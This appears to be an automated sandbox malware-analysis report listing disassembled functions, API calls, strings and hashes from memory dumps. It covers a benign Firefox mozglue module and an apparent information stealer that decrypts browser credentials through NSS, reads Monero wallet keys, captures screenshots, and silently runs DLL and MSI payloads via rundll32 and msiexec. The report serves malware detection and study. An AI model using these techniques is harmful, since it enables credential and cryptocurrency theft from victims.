nativeallocations, xrefs: 6C5CCDA8
notimerresolutionchange, xrefs: 6C5CCE00
leaf, xrefs: 6C5CCC66
fileio, xrefs: 6C5CCC92
noiostacks, xrefs: 6C5CCCBE
jsallocations, xrefs: 6C5CCD0E
cpuallthreads, xrefs: 6C5CCE16
seqstyle, xrefs: 6C5CCCE6
java, xrefs: 6C5CCC37
ipcmessages, xrefs: 6C5CCDBE
processcpu, xrefs: 6C5CCE6E
default, xrefs: 6C5CCC21
audiocallbacktracing, xrefs: 6C5CCDD4
nostacksampling, xrefs: 6C5CCD7C
samplingallthreads, xrefs: 6C5CCE2C
unregisteredthreads, xrefs: 6C5CCE58
preferencereads, xrefs: 6C5CCD92
screenshots, xrefs: 6C5CCCD4
stackwalk, xrefs: 6C5CCCF8
power, xrefs: 6C5CCE84
mainthreadio, xrefs: 6C5CCC7C
Unrecognized feature "%s"., xrefs: 6C5CCEA0

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 2126ecce877e558b2c0407165726b6bcc4cdd3ee585cfce7aaa0e05fe2ed4d75
Instruction ID: 4dfb15900d8c2918355f8d936bbe25e52ca8b00c8f73d836963ce89c60aa9981
Opcode Fuzzy Hash: 2126ecce877e558b2c0407165726b6bcc4cdd3ee585cfce7aaa0e05fe2ed4d75
Instruction Fuzzy Hash: B451CAF1B4526552FA1971992D10BAA1444EF9338AF10043EED27A1EC0FB45BE4F8EB7

Function 6C594470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C594730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C5944B2,6C60E21C,6C60F7F8), ref: 6C59473E
Part of subcall function 6C594730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C59474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C5944BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C5944D2
InitOnceExecuteOnce.KERNEL32(6C60F80C,6C58F240,?,?), ref: 6C59451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C59455C
LoadLibraryW.KERNEL32(?), ref: 6C594592
InitializeCriticalSection.KERNEL32(6C60F770), ref: 6C5945A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C5945AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C5945BB
InitOnceExecuteOnce.KERNEL32(6C60F818,6C58F240,?,?), ref: 6C594612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C594636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C594644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C59466D
VerSetConditionMask.NTDLL ref: 6C59469F
VerSetConditionMask.NTDLL ref: 6C5946AB
VerSetConditionMask.NTDLL ref: 6C5946B2
VerSetConditionMask.NTDLL ref: 6C5946B9
VerSetConditionMask.NTDLL ref: 6C5946C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5946CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C5946F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C5946FD

Strings

l, xrefs: 6C594578
user32.dll, xrefs: 6C594557, 6C59463F
G`l, xrefs: 6C5944FC
WRusr.dll, xrefs: 6C5944B5
kernel32.dll, xrefs: 6C5944CD
NativeNtBlockSet_Write, xrefs: 6C5946F7

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: G`l$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-1035642076
Opcode ID: 3d237381a865f1fb470d643d03e61967473e397f9f9d7a209bc96f65bd5d88f4
Instruction ID: 875713a1608b5f47878c318b0794524f874caf8a7f7b1fe15cbf0c9965ae1c60
Opcode Fuzzy Hash: 3d237381a865f1fb470d643d03e61967473e397f9f9d7a209bc96f65bd5d88f4
Instruction Fuzzy Hash: C56114B0700384AFEB149F62DE85B957BB8FB86308F04C59CE514AB641D7B08945CF5A

Function 003CC990 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 003CC9A5

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E6DD98,00000000,?,003E144C,00000000,?,?), ref: 003CCA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 003CCA89
GetFileSize.KERNEL32(00000000,00000000), ref: 003CCA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003CCAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003CCAD9
StrStrA.SHLWAPI(?,00E6DC48,003E0B52), ref: 003CCAF7
StrStrA.SHLWAPI(00000000,00E6DCA8), ref: 003CCB1E
StrStrA.SHLWAPI(?,00E6E8D8,00000000,?,003E1458,00000000,?,00000000,00000000,?,00E6A128,00000000,?,003E1454,00000000,?), ref: 003CCCA2
StrStrA.SHLWAPI(00000000,00E6E878), ref: 003CCCB9

Part of subcall function 003CC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003CC871
Part of subcall function 003CC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003CC87C
Part of subcall function 003CC820: PK11_GetInternalKeySlot.NSS3 ref: 003CC88A
Part of subcall function 003CC820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 003CC8A5
Part of subcall function 003CC820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 003CC8EB
Part of subcall function 003CC820: PK11_FreeSlot.NSS3(?), ref: 003CC961

StrStrA.SHLWAPI(?,00E6E878,00000000,?,003E145C,00000000,?,00000000,00E6A118), ref: 003CCD5A
StrStrA.SHLWAPI(00000000,00E69FE8), ref: 003CCD71

Part of subcall function 003CC820: lstrcat.KERNEL32(?,003E0B46), ref: 003CC943
Part of subcall function 003CC820: lstrcat.KERNEL32(?,003E0B47), ref: 003CC957
Part of subcall function 003CC820: lstrcat.KERNEL32(?,003E0B4E), ref: 003CC978

lstrlen.KERNEL32(00000000), ref: 003CCE44
CloseHandle.KERNEL32(00000000), ref: 003CCE9C
NSS_Shutdown.NSS3 ref: 003CCEAA

Strings

, xrefs: 003CC9C6
x, xrefs: 003CCCAE, 003CCD4D

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID: $x
API String ID: 1052888304-686632675
Opcode ID: f0410c1e2cf54786340392325d2471739f3ac2918637c7083ca4b8fc8ebc5636
Instruction ID: 331aa09bf89f715a380e06b1378530fc4c3c745fddf0904fbdcaa89b0ac940b2
Opcode Fuzzy Hash: f0410c1e2cf54786340392325d2471739f3ac2918637c7083ca4b8fc8ebc5636
Instruction Fuzzy Hash: 9AE13372810648ABCB16EBE0ED91FEE7779BF14300F40415AF5066B291DF306A4ADF66

Function 003D12D0 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

, xrefs: 003D13FA

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-2740779761
Opcode ID: 95056ed8a507cefa569c3037b503913f2eafe601459683d0ca7eb83ab90352ba
Instruction ID: 66030d6ee777b088a4b1877a0acd3fb90cd4e0a4ca96d49a4b4b575e1d28e649
Opcode Fuzzy Hash: 95056ed8a507cefa569c3037b503913f2eafe601459683d0ca7eb83ab90352ba
Instruction Fuzzy Hash: 2DC1EAB694021C9BCB15EF60ED89FEA7379BF54300F00459AF50A5B341EB70AA85DF91

Function 003D9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003D906C

Strings

image/jpeg, xrefs: 003D9136

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: 3abd59fc25d5c147deb24493ed136f08f86d440fdb9ec07b28f7edfc9c38186e
Instruction ID: 66c8d247cbfd465da144c81c36a68d580d5d50e5ac0b6440f77407f920544e19
Opcode Fuzzy Hash: 3abd59fc25d5c147deb24493ed136f08f86d440fdb9ec07b28f7edfc9c38186e
Instruction Fuzzy Hash: 5671EE75950308ABDB04EFE4DC89FEEB7B9BF48740F108509F515AB290DB74A905CB61

Function 6C5DD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5DD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C5DD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5DD52A
GetCurrentThreadId.KERNEL32 ref: 6C5DD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C5DD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5DD55F
free.MOZGLUE(00000000), ref: 6C5DD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C5DD5D3
GetCurrentThreadId.KERNEL32 ref: 6C5DD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C5DD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5DD652
GetCurrentThreadId.KERNEL32 ref: 6C5DD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C5DD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5DD6A2

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 69b9e3907ed31c7cbaab72002136a1641ac50aa0004b4f8f7ce1b61ca67b0688
Instruction ID: b9be3d818adf635008d1423f230193079b2014f1dd16b7a1356c746c14bd844d
Opcode Fuzzy Hash: 69b9e3907ed31c7cbaab72002136a1641ac50aa0004b4f8f7ce1b61ca67b0688
Instruction Fuzzy Hash: 5F517B71604705DFCB04DF25C888A9ABBF4FF89358F108A2EE85A97711EB30B845CB95

Function 003D17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 003D17C5
ExitProcess.KERNEL32 ref: 003D17D1

Strings

block, xrefs: 003D17B7

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 7d62628848599bf301f2b480a6ca9bf227f1dd263eac8ea224479540683a76a9
Instruction ID: fed2f4797b7ce9cbab61a1038400f092c116b3b418e228f0e716265370fc49ab
Opcode Fuzzy Hash: 7d62628848599bf301f2b480a6ca9bf227f1dd263eac8ea224479540683a76a9
Instruction Fuzzy Hash: 05515FB6A40209FBCB06DFA1E964ABE77B9FF44704F10914AE4056B340D770DA51DB62

Function 003D2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

ShellExecuteEx.SHELL32(0000003C), ref: 003D31C5
ShellExecuteEx.SHELL32(0000003C), ref: 003D335D
ShellExecuteEx.SHELL32(0000003C), ref: 003D34EA

Strings

"" , xrefs: 003D309A
/i ", xrefs: 003D33E4
/passive, xrefs: 003D345B
.msi, xrefs: 003D3398
C:\Windows\system32\rundll32.exe, xrefs: 003D3332
<, xrefs: 003D3490
.dll, xrefs: 003D31E5
C:\Windows\system32\msiexec.exe, xrefs: 003D34BF

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 273425ef39d0bf35f862ced2444aa16bd2b6a54a946c7734b76ce6f665747fe8
Instruction ID: 19b595645ac411bd9885cd3287be0d0624c5aa8e31678e0e5f812a833b439b84
Opcode Fuzzy Hash: 273425ef39d0bf35f862ced2444aa16bd2b6a54a946c7734b76ce6f665747fe8
Instruction Fuzzy Hash: A71223728005189ADB0AFBA0ED92FDEB778BF14300F50415AF5066A291EF742B4ADF56

Function 6C5CEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C594A68), ref: 6C5C945E
